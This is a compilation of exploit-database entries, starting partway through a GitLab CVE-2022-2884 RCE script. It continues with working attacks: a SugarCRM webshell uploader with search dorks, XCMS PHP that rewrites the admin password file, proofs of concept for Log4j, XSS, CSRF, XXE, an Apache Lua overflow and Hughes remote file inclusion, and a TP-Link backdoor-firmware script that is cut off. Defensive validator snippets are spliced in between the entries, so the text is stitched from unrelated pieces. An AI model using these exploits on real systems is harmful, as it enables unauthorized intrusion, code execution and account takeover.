        "teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams",
        "temp_clone_token": generate_random_string(32),
        "topics": [],
        "trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}",
        "updated_at": "2022-06-10T15:12:53Z",
        "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}",
        "use_squash_pr_title_as_default": False,
        "visibility": "private",
        "watchers": 0,
        "watchers_count": 0,
        "web_commit_signoff_required": False
    }
    return response


def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command):
    rce_payload = generate_rce_payload(command)
    response = [
        {
            "active_lock_reason": None,
            "assignee": None,
            "assignees": [],
            "author_association": "OWNER",
            "body": "hn-issue description",
            "closed_at": None,
            "comments": 1,
            "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments",
            "created_at": "2021-07-23T13:16:55Z",
            "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events",
            "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3",
            "id": int(fake_issue_id),
            "labels": [],
            "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}",
            "locked": False,
            "milestone": None,
            "node_id": base64encode(f"05:Issue{fake_issue_id}"),
            "_number": 1,
            "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}"}},
            "performed_via_github_app": None,
            "reactions": {
                "+1": 0,
                "-1": 0,
                "confused": 0,
                "eyes": 0,
                "heart": 0,
                "hooray": 0,
                "laugh": 0,
                "rocket": 0,
                "total_count": 0,
                "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions"
            },
            "repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test",
            "state": "open",
            "state_reason": None,
            "timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline",
            "title": f"{fake_repo}",
            "updated_at": "2022-08-14T15:37:08Z",
            "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3",
            "user": generate_user_response(attacker_server, fake_user, fake_user_id)
        }
    ]
    return response


@app.before_request
def received_request():
    logging.debug(f"Received request:")
    logging.debug(f"    url = {request.url}")
    logging.debug(f"headers = {request.headers}")


@app.after_request
def add_headers(response):
    response.headers["content-type"] = "application/json; charset=utf-8"
    response.headers["x-ratelimit-limit"] = "5000"
    response.headers["x-ratelimit-remaining"] = "4991"
    response.headers["x-ratelimit-reset"] = "1660136749"
    response.headers["x-ratelimit-used"] = "9"
    response.headers["x-ratelimit-resource"] = "core"
    return response


@app.route("/")
def index():
    return "The server is running."


@app.route("/api/v3/rate_limit")
def api_rate_limit():
    response = {
        "resources": {
            "core": {
                "limit": 5000,
                "used": 9,
                "remaining": 4991,
                "reset": 1660136749
            },
            "search": {
                "limit": 30,
                "used": 0,
                "remaining": 30,
                "reset": 1660133589
            },
            "graphql": {
                "limit": 5000,
                "used": 0,
                "remaining": 5000,
                "reset": 1660137129
            },
            "integration_manifest": {
                "limit": 5000,
                "used": 0,
                "remaining": 5000,
                "reset": 1660137129
            },
            "source_import": {
                "limit": 100,
                "used": 0,
                "remaining": 100,
                "reset": 1660133589
            },
            "code_scanning_upload": {
                "limit": 1000,
                "used": 0,
                "remaining": 1000,
                "reset": 1660137129
            },
            "actions_runner_registration": {
                "limit": 10000,
                "used": 0,
                "remaining": 10000,
                "reset": 1660137129
            },
            "scim": {
                "limit": 15000,
                "used": 0,
                "remaining": 15000,
                "reset": 1660137129
            },
            "dependency_snapshots": {
                "limit": 100,
                "used": 0,
                "remaining": 100,
                "reset": 1660133589
            }
        },
        "rate": {
            "limit": 5000,
            "used": 9,
            "remaining": 4991,
            "reset": 1660136749
        }
    }
    return response


@app.route("/api/v3/repositories/<repo_id>")
@app.route("/repositories/<repo_id>")
def api_repositories_repo_id(repo_id: int):
    address = current_app.config["address"]
    port = current_app.config["port"]
    attacker_server = current_app.config["attacker_server"]
    fake_user = current_app.config["fake_user"]
    fake_user_id = current_app.config["fake_user_id"]
    fake_repo = current_app.config["fake_repo"]
    response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id)
    return response


@app.route("/api/v3/repos/<user>/<repo>")
def api_repositories_repo_user_repo(user: string, repo: string):
    address = current_app.config["address"]
    port = current_app.config["port"]
    attacker_server = current_app.config["attacker_server"]
    fake_user_id = current_app.config["fake_user_id"]
    fake_repo_id = current_app.config["fake_repo_id"]
    response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id)
    return response


@app.route("/api/v3/repos/<user>/<repo>/issues")
def api_repositories_repo_user_repo_issues(user: string, repo: string):
    attacker_server = current_app.config["attacker_server"]
    fake_user_id = current_app.config["fake_user_id"]
    fake_issue_id = current_app.config["fake_issue_id"]
    command = current_app.config["command"]
    response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command)
    return response


@app.route("/api/v3/users/<user>")
def api_users_user(user: string):
    attacker_server = current_app.config["attacker_server"]
    fake_user_id = current_app.config["fake_user_id"]
    response = generate_user_full_response(attacker_server, user, fake_user_id)
    return response


@app.route("/<user>/<repo>.git/HEAD")
@app.route("/<user>/<repo>.git/info/refs")
@app.route("/<user>/<repo>.wiki.git/HEAD")
@app.route("/<user>/<repo>.wiki.git/info/refs")
def empty_response(user: string, repo: string):
    logging.debug("Empty string response.")
    return ""


# All the others/non-existing routes.
@app.route('/<path:path>')
def catch_all(path):
    logging.debug("Empty JSON array response.")
    return []


def main():
    args = parse_arguments()
    logging_level = DEFAULT_LOGGING_LEVEL
    if args.verbose:
        logging_level = logging.DEBUG
    logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")
    validate_input(args)
    url = args.url.strip()
    private_token = args.private_token.strip()
    target_namespace = args.target_namespace.strip()
    address = args.address.strip()
    port = args.port
    is_https = args.https
    command = args.command.strip()
    delay = args.delay
    logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}")
    logging.debug("Parameters:")
    logging.debug(f"             url = {url}")
    logging.debug(f"   private_token = {private_token}")
    logging.debug(f"target_namespace = {target_namespace}")
    logging.debug(f"         address = {address}")
    logging.debug(f"            port = {port}")
    logging.debug(f"        is_https = {is_https}")
    logging.debug(f"         command = {command}")
    logging.debug(f"           delay = {delay}")
    fake_repo_id = generate_random_number(9)
    fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id))
    fake_github_server.start()
    logging.info("Waiting for the fake GitHub server to start.")
    while not is_server_alive(address, port, is_https):
        time.sleep(1)
        logging.debug("Waiting for the fake GitHub server to start.")
    logging.info("Fake GitHub server is running.")
    try:
        send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id)
    except:
        logging.critical("Aborting the script.")
        fake_github_server.kill()
        sys.exit(1)
    if delay is not None:
        logging.info(f"Waiting for {delay} seconds to let attack finish.")
        time.sleep(delay)
    else:
        logging.info("Press Enter when the attack is finished.")
        input()
    logging.debug("Stopping the fake GitHub server.")
    fake_github_server.kill()
    logging.info("Closing the script.")


if __name__ == "__main__":
    main()
```
# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path
# Date: 12/20/2022
# Exploit Author: A.I. hernandez
# Version: 8.71.12001.0
# Vendor Homepage: https://www.splashtop.com
# Version: current version
# Tested on: Windows 10 21H2
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe Auto
C:\>sc qc SSUService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SSUService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Splashtop Software Updater Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
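The wmic and sc output above is how the finding is discovered by hand. As an added illustration that is not part of this advisory, the Python below parses service rows of the same shape, flags auto-start services whose binary path is unquoted and contains a space, and produces the sc config command that quotes the path. The SSUService row is taken from the wmic output; the other sample rows are constructed, and the function names are my own.

```python
import re

# The first ".exe" that is followed by whitespace or the end of the string is taken
# as the end of the binary path; whatever follows is treated as arguments.
_EXE_SPLIT = re.compile(r"^(?P<exe>.+?\.exe)(?P<args>(?:\s.*)?)$", re.IGNORECASE | re.DOTALL)

# Constructed sample: the first row is the SSUService row from the wmic output above,
# the other rows are made up to show a correctly quoted path and a manual-start service.
SAMPLE_SERVICES = [
    ("Splashtop Software Updater Service", "SSUService",
     r"C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe", "Auto"),
    ("Example Quoted Service", "ExQuoted",
     r'"C:\Program Files\Example\svc.exe" -k netsvcs', "Auto"),
    ("Example Manual Service", "ExManual",
     r"C:\Program Files\Example Vendor\agent.exe --service", "Manual"),
]


def is_unquoted_with_spaces(pathname):
    """True when the binary path is not wrapped in quotes and contains a space,
    which is the condition the Windows service start path lookup mishandles."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    m = _EXE_SPLIT.match(p)
    exe = m.group("exe") if m else p
    return " " in exe


def quote_binary_path(pathname):
    """Return the remediated path: the executable quoted, arguments left as they were."""
    p = pathname.strip()
    if not is_unquoted_with_spaces(p):
        return p
    m = _EXE_SPLIT.match(p)
    if m:
        return '"%s"%s' % (m.group("exe"), m.group("args"))
    return '"%s"' % p


def sc_config_command(service_name, quoted_path):
    """sc.exe needs the space after 'binPath=' and the inner quotes escaped."""
    return 'sc config %s binPath= "%s"' % (service_name, quoted_path.replace('"', '\\"'))


def audit(services, auto_only=True):
    """Return [(service name, remediation command)] for every affected service."""
    findings = []
    for _display, name, pathname, startmode in services:
        if auto_only and startmode.lower() != "auto":
            continue
        if is_unquoted_with_spaces(pathname):
            findings.append((name, sc_config_command(name, quote_binary_path(pathname))))
    return findings


if __name__ == "__main__":
    for name, fix in audit(SAMPLE_SERVICES):
        print(name, "->", fix)
```

The audit only reports auto-start services by default, matching the wmic filter in the advisory; pass auto_only=False to review every service. On a live host the rows would come from the same wmic query or from Get-CimInstance Win32_Service.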
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)
# Exploit Author: Chan Nyein Wai & Thura Moe Myint
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/
# Software Link: https://www.manageengine.com/products/ad-manager/download.html
# Version: Ad Manager Plus Before 7122
# Tested on: Windows
# CVE : CVE-2021-44228
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md
### Description
In the summer of 2022, I was doing a security engagement on the Synack
Red Team in collaboration with my good friend (Thura Moe Myint).
At that time, Log4j was already widespread on the internet. ManageEngine
had already patched Ad Manager Plus to prevent it from
being affected by the Log4j vulnerability. They had mentioned that
Log4j was not affected by Ad Manager Plus. However, we determined that
Ad Manager Plus was running on our target and managed to exploit
the Log4j vulnerability.
### Exploitation
First, let's make a login request using a proxy.
Inject the following payload in the `methodToCall` parameter of
the `ADSearch.cc` request.
Then you will get the DNS callback with the username in your Burp Collaborator.
### Notes
When we initially reported this vulnerability to Synack, we only
managed to get a DNS callback and our report was marked as LDAP
injection. However, we attempted to gain full RCE on the host but were
not successful. Later, we discovered that Ad Manager Plus was running
on another target, so we tried to get full RCE on that target. We
realized that there was a firewall and an anti-virus running on the
machine, so most of our payloads wouldn't work. After spending a
considerable amount of time, we eventually managed to bypass the
firewall and anti-virus, and achieve full RCE.
### Conclusion
We had already informed Zoho about the log4j vulnerability, and even
after it was fixed, they decided to reward us with a bonus bounty for
our report.
### Mitigation
Updating to a version of Ad Manager Plus higher than 7122 should
resolve the issue.
Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.5
Vulnerability Type: Partial Blind CSRF
Discovered by: Ryan Moore
CVE: CVE-2022-41413
Summary
A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the "url" query parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHttpRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR.
This vulnerability was patched in perfSONAR v4.4.6.
Proof of Concept
Examples
Here are two examples of this vulnerability. For further details, review the Technical Overview section below.
Example 1:
Client browser connects to www.google.com in the background.
http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com
Example 2:
Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint.
http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api
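Added example, not part of the advisory or of perfSONAR's own code: a server-side check that would have refused both URLs above. It accepts the url parameter only when its host is on a fixed allowlist (the host names are placeholders assumed here) and rebuilds the backend query with urlencode, so a decoded dest value such as &action=delete stays one parameter value instead of becoming a second parameter. Function names are my own.

```python
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Assumed allowlist of perfSONAR hosts this graphs page may fetch results from
# (placeholder names; a real deployment would use its own measurement hosts).
ALLOWED_HOSTS = {"ps1.example.org", "ps2.example.org"}


def is_allowed_graph_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Accept only http(s) URLs whose host is allowlisted. urlsplit().hostname is
    lowercased and has userinfo and port stripped, so "ps1.example.org@evil" or a
    surprise port cannot slip past the comparison."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    return host is not None and host in allowed_hosts


def backend_request(query_string, allowed_hosts=ALLOWED_HOSTS):
    """Given the raw query string of /perfsonar-graphs/, return the backend URL the
    page may fetch, or None when the url parameter is not allowlisted. source and
    dest are re-encoded, never concatenated as received."""
    q = parse_qs(query_string, keep_blank_values=True)
    target = q.get("url", [""])[0]
    if not is_allowed_graph_url(target, allowed_hosts):
        return None
    source = q.get("source", [""])[0]
    dest = q.get("dest", [""])[0]
    base = urlsplit(target)
    query = urlencode({"source": source, "dest": dest})
    return urlunsplit((base.scheme, base.netloc, base.path or "/", query, ""))


def parameter_names(url):
    """Names of the query parameters the backend will actually see."""
    return sorted(parse_qs(urlsplit(url).query, keep_blank_values=True))


if __name__ == "__main__":
    print(backend_request("source=1&dest=2&url=https://www.google.com"))
    print(backend_request("source=8.8.8.8&dest=%26action%3Ddelete&url=https://ps1.example.org/api"))
```

With the advisory's second URL pointed at an allowlisted host, the injected dest value survives only as the literal text "&action=delete" inside the dest parameter; the backend never sees an action parameter.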
Exploit Title: XCMS v1.83 - Remote Command Execution (RCE)
Author: Onurcan
Email: onurcanalcan@gmail.com
Site: ihteam.net
Script Download : http://www.xcms.it
Date: 26/12/2022
The xcms footer (stored in "/dati/generali/footer.dtb") is included in each page of xcms.
Taking "home.php" for example:
<?php
//home.php
[...]
include(CSTR."footer".STR); // <- "CSTR" and "STR" are constants declared earlier. They refer to "/dati/generali" and "dtb"
?>
So xcms allows you to modify the footer through a bugged page called cpie.php included in the admin panel.
So let's take a look at the bugged code.
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- an exit() is missing :-D
[...]
if(isset($_POST['salva'])){
    Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- saves the changes without any kind of check
}
[...]
?>
So with a simple html form we can change the footer.
Ex:
<form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
<input type="hidden" name="salva" value="OK" />
<textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
<input type="submit" value="Modifica" />
</form>
<script>document.editor.submit()</script>
Note: This is NOT a CSRF; it is just an example of changing the footer without the admin credentials.
Trick: We can change the admin panel password by inserting this code in the footer:
<?php
$pwd = "owned"; // <- Place your new password here.
$pwd2 = md5($pwd);
unlink("dati/generali/pass.php");
$f = fopen("dati/generali/pass.php","w");
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
fclose($f);
?>
This code deletes the old password file and then creates a new one with your new password.
Fix:
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
[...]
if(isset($_POST['salva'])){
    Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- saves the changes without any kind of check
}
[...]
?>
So this is a simple exploit:
<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
    echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
    echo "
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork : inurl:\"mod=notizie\"
by Onurcan
Visit ihteam.net
</pre>
<form method=POST action=".$_SERVER['PHP_SELF'].">
<pre>
Site :
<input type=text name=site />
Code :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>
# Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE
# Date: 21/12/2022
# Exploit Author: @xhzeem
# Vendor Homepage:
https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html
# Version: v10.5.1030.8315
Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE.
Proof Of Concept:
http://www.example.com/default.aspx?document=file.xml
The file.xml can carry an out-of-band (OOB) XXE payload or any other blind XXE payload.
#!/usr/bin/env python
# Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE)
# Exploit Author: sw33t.0day
# Vendor Homepage: https://www.sugarcrm.com
# Version: all commercial versions up to 12.2.0
# Dorks:
# https://www.google.com/search?q=site:sugarondemand.com&filter=0
# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php
# https://www.shodan.io/search?query=http.title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"
import base64, re, requests, sys, uuid

requests.packages.urllib3.disable_warnings()

if len(sys.argv) != 2:
    sys.exit("Usage: %s [URL]" % sys.argv[0])

print("[+] Sending authentication request")
url = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}
requests.post(url, cookies=session, data=params, verify=False)

print("[+] Uploading PHP shell\n")
# PNG polyglot: valid image header with the PHP payload carried in a chunk.
png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")}  # you can also try with other extensions like .php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}
requests.post(url, cookies=session, data=params, files=upload, verify=False)

url = sys.argv[1] + "/cache/images/sweet.phar"
while True:
    cmd = input("# ")
    res = requests.post(url, data={"c": base64.b64encode(cmd.encode())}, verify=False)
    res = re.search("#####(.*)#####", res.text, re.DOTALL)
    if res:
        print(res.group(1))
    else:
        sys.exit("\n[+] Failure!\n")
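The upload step works because the file begins with a valid PNG signature while its extension is one PHP will execute, and the server stores it under the client-supplied name inside the web root. As an added example that is not part of the exploit or of SugarCRM's code, the Python below builds a small PNG with text hidden in a tEXt chunk (constructed sample data) and shows an upload validator that rejects it on extension, then on content, and never reuses the client's file name. Function names and the extension allowlist are assumptions.

```python
import os
import secrets
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
# Byte sequences that must never appear in something served as an image from a PHP host.
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")


def make_png(text_chunk=b""):
    """Build a minimal valid 1x1 RGB PNG (constructed sample data). When text_chunk is
    given it is stored in a tEXt chunk, which is the kind of slot a polyglot uses to
    carry code while still starting with a real PNG signature."""
    def chunk(tag, data):
        crc = zlib.crc32(tag + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")             # filter byte + one black pixel
    body = chunk(b"IHDR", ihdr)
    if text_chunk:
        body += chunk(b"tEXt", text_chunk)
    body += chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    return PNG_MAGIC + body


def validate_upload(filename, data):
    """Return (accepted, reason). Each check alone is bypassable; together they stop
    the renamed-image trick used above."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"       # .phar/.php5/.phtml stop here
    if not data.startswith(PNG_MAGIC):
        return False, "content is not a PNG"        # only PNG is modelled in this example
    lowered = data.lower()
    if any(marker in lowered for marker in PHP_MARKERS):
        return False, "embedded PHP tag"            # the polyglot's payload stops here
    return True, "ok"


def safe_storage_name(filename):
    """Never reuse the client-supplied name: random name, validated extension only."""
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    sample = make_png(b"<?php echo 1; ?>")
    for name in ("sweet.phar", "sweet.png", "photo.png"):
        print(name, validate_upload(name, sample if name.startswith("sweet") else make_png()))
```

The marker scan can false-positive on compressed pixel data, so a stronger variant re-encodes every accepted image with an image library (which drops non-pixel chunks) and stores the result outside the web root or on a path where the server never executes scripts.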
# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10
# Proof Of Concept:
http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E
Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion
Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37
Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high-performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.
Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.
Tested on: WindWeb/1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php
23.12.2022
--
snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//
//URL http://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()
console.log("Loading Broadband Satellite Browsing Test");
//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");
console.log("Calling StartTest()");
StartTest()
//console.log("Calling DoTest()");
//DoTest()
//Unload weapon
//document.getElementById("URLList").remove();
# Exploit Title: Apache 2.4.x - Buffer Overflow
# Date: Jan 2 2023
# Exploit Author: Sunil Iyengar
# Vendor Homepage: https://httpd.apache.org/
# Software Link: https://archive.apache.org/dist/httpd/
# Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
# Tested on: (Server) Kali, (Client) MacOS Monterey
# CVE : CVE-2021-44790
import requests

# Example "http(s)://<hostname>/process.lua"
url = "http(s)://<hostname>/<luafile>"
payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
headers = {
    'Content-Type': 'multipart/form-data; boundary=4'
}
# Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else, like 1,
#        but it has to match the value used in the payload.
# Note2: The form data as shown above returns the response "memory allocation error: block too big".
#        Changing the payload to name=\"name\"\r\n\r\n\r\n4\r\n" avoids the error, but the Lua module then
#        overflows 3 more bytes during memset.
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
# Response returned is
# <h3>Error!</h3>
# <pre>memory allocation error: block too big</pre>
#!/usr/bin/python3
# Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Tobias Müller
# Date: 2022-12-01
# Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329
# Vendor Homepage: https://www.tp-link.com/
# Tested On: TP-Link TL-WR902AC
# Vulnerability Description: Remote Code Execution via importing malicious firmware file
# CVE: CVE-2022-48194
# Technical Details: https://github.com/otsmr/internet-of-vulnerable-things

TARGET_HOST = "192.168.0.1"
ADMIN_PASSWORD = "admin"
TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip"

import base64
import glob
import hashlib
import os
import shutil
import subprocess

import requests
from Crypto.Cipher import AES, PKCS1_v1_5  # pip install pycryptodome
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad

for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]:
    if shutil.which(program) is None:
        print(f"[!] need {program} to run")
        exit(1)


class WebClient(object):

    def __init__(self, host, password):
        self.host = "http://" + host
        self.password = password
        # the login signature carries md5("admin" + password) as hex
        self.password_hash = hashlib.md5(('admin%s' % password).encode('utf-8')).hexdigest()
        self.aes_key = "7765636728821987"
        self.aes_iv = "8775677306058909"
        self.session = requests.Session()
        # the router hands out the RSA public key (e, n) and the sequence counter
        crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text
        self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16)
        self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16)
        self.seq = int(crypto_data.split("\n")[3].split('"')[1])
        self.jsessionid = self.get_jsessionid()

    def get_jsessionid(self):
        post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n"
        self.get_encrypted_request_data(post_data, True)
        return self.session.cookies["JSESSIONID"]

    def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
        cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8'))
        plaintext_padded = pad(plaintext, aes_block_size)
        return cipher.encrypt(plaintext_padded)

    def rsa_encrypt(self, n, e, plaintext):
        public_key = RSA.construct((n, e)).publickey()
        encryptor = PKCS1_v1_5.new(public_key)
        block_size = int(public_key.n.bit_length() / 8) - 11
        encrypted_text = ''
        for i in range(0, len(plaintext), block_size):
            encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex()
        return encrypted_text

    def get_encrypted_request_data(self, post_data, is_login: bool):
        # body is AES-CBC encrypted; the signature (hash, seq, and on login the AES key/iv) is RSA encrypted
        encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8'))
        encrypted_data = base64.b64encode(encrypted_data).decode()
        self.seq += len(encrypted_data)
        signature = f"h={self.password_hash}&s={self.seq}"
        if is_login:
            signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature
        encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8'))
        body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n"
        return self.cgi_basic("_gdpr", body)

    def cgi_basic(self, url: str, body: str):
        res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={
            "Referer": "http://192.168.0.1/"
        })
        if res.status_code != 200:
            print(res.text)
            raise ValueError("router not reachable")
        return res


def cmd(command):
    print("[*] running " + command)
    os.system(command)


def build_backdoor():
    if os.path.isdir("./tp_tmp"):
        cmd("rm -r -f ./tp_tmp")
    os.mkdir("./tp_tmp")
    os.chdir('./tp_tmp')

    print("[*] downloading firmware")
    res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD)
